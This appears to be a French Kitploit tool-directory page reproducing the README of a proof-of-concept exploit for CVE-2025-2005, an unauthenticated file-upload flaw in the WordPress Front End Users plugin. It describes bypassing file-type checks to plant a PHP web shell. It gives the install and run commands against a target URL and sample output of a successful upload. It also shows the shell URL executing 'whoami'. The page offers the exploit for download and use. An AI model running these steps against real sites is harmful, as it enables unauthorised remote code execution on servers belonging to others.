Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-2005 — Exploit de téléversement arbitraire de fichier pour WordPress FEUP (CVE-2025-2005) | Kitploit
Outils/GitHubGitHub/mrmtwoj/cve-2025-2005
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubmrmtwoj/cve-2025-2005

CVE-2025-2005

Exploit de téléversement arbitraire de fichier pour WordPress FEUP (CVE-2025-2005)

Voir le dépôt
31il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)

Ce dépôt fournit un exploit Proof of Concept (PoC) pour le plugin WordPress Front End Users (versions jusqu'à 3.2.32), qui est vulnérable au téléchargement arbitraire de fichiers en raison de l'absence de validation MIME/type de fichier dans son formulaire d'inscription. Cela permet à des attaquants non authentifiés de télécharger des fichiers malveillants (par exemple, des webshells), pouvant conduire à une exécution de code à distance (RCE) sur le serveur.

Fonctionnalités

  • CVE-2025-2005 : vulnérabilité de téléchargement de fichiers du plugin WordPress Front End Users
  • Interface en ligne de commande simple
  • Découverte automatique des formulaires d'inscription
  • Uploader de shell avec nom d'utilisateur/mot de passe personnalisés

Fonctionnement

  • Il envoie une demande d'inscription au formulaire d'inscription FEUP vulnérable.
  • Téléverse un shell PHP via le champ de saisie de fichier, en contournant les restrictions de type de fichier.
  • Affiche le statut du téléversement et indique si le site est vulnérable.

Cibles de test

  • Recherche les formulaires d'inscription contenant :
  • ewd-feup-register-form
  • Sur des URLs telles que :
root@kitploit:~
/register/
/signup/
  • ou tout lien trouvé sur la page d'accueil

Pour commencer

  • Python 3.x
  • modules requests et beautifulsoup4 :
root@kitploit:~
pip install requests beautifulsoup4

Installation

root@kitploit:~
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005

Utilisation

root@kitploit:~
python3 exploit.py --url http://target.com --user hacker --password pass123

Exemple de sortie

root@kitploit:~
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!

Exécution de l'exploit

root@kitploit:~
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami
Télécharger l’outil